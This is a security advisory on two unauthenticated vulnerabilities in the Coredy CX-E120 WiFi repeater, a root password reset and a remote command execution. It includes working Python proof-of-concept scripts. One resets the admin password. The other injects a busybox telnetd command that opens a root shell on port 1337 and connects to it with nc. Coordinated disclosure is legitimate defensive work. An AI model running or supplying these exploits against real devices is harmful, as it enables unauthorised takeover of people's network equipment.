Coredy CX-E120 Repeater Multiple Vulnerabilities

### Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in Coredy CX-E120 Repeater. The Coredy CX-E120 WiFi Range Extender is “a network device with multifunction, which can be using for increasing the distance of a WiFi network by boosting the existing WiFi signal and enhancing the overall signal quality over long distances. An extender repeats the signals from an existing WiFi router or access point.” ### The vulnerabilities found are: * Unauthenticated Root Password Reset * Unauthenticated Remote Command Execution ### Credit An independent security researcher, Corben Douglas (@sxcurity), has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program Vendor response Coredy has released patches to address these vulnerabilities (WN575A3-A-RPTA3-75W.M4300.01.GD.2017Nov22-WEBC.bin). ### Vulnerabilities details #### Unauthenticated Root Password Reset An unauthenticated user is able to send a POST request to /cgi-bin/adm.cgi which can then be used to reset the root password with parameter page=sysAdm, username=, and the values of the new password: newpass= and confpass=. #### Proof of Concept ``` #!/usr/bin/env python import sys,requests, httplib def main(): ip = sys.argv[1] port = sys.argv[2] user = sys.argv[3] password = sys.argv[4] target = ip+':'+port+'/cgi-bin/adm.cgi' headers = { 'user-agent':'repeater-pwn', 'Content-Type':'application/x-www-form-urlencoded', } data = 'page=sysAdm&username='+user+'&newpass='+password+'&confpass='+password req = requests.post(target,data,headers=headers) try: main() except IndexError: print("Usage: python "+sys.argv[0]+" http://<target> <port> admin newpassword") except requests.exceptions.ChunkedEncodingError: print("\n\033[92m[+] Attack Sent\033[0m\n\033[91m[+] Try login with new credentials\033[0m") except httplib.IncompleteRead: print("\n\033[92m[+] Attack Sent\033[0m\n\033[91m[+] Try login with new credentials\033[0m") ``` #### Remote Command Execution An unauthenticated user is able to send a POST request to /cgi-bin/adm.cgi with the following parameters: page=sysCMD, SystemCommandSubmit=Apply, and command= with the command you run to run. The input is passed as root cmd command for execution. #### Proof of concept ``` #!/usr/bin/env python import sys,os,requests from lxml import html def main(): ip = sys.argv[1] prt = sys.argv[2] cmd = '/bin/busybox telnetd -l/bin/sh -p1337' target = 'http://'+ip+':'+prt+'/cgi-bin/adm.cgi' payload = 'page=sysCMD&command='+cmd+'&SystemCommandSubmit=Apply' headers = { 'User-Agent': 'repeater-pwn', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': 'http://'+ip+':'+prt+'/webcmd.shtml' } r = requests.post(target,data=payload, headers=headers) final = requests.get(r.url) #pwnd = html.fromstring(final.content) #result = pwnd.xpath('//textarea/text()') #print result print "\n[+] ATTACK SENT" print "[+] Attempted to spawn /bin/sh on port 1337...attempting to connect\n" os.system("nc " +ip+ ' 1337') try: main() except IndexError: print("Usage: python "+sys.argv[0]+" <IP> <PORT>\n") ```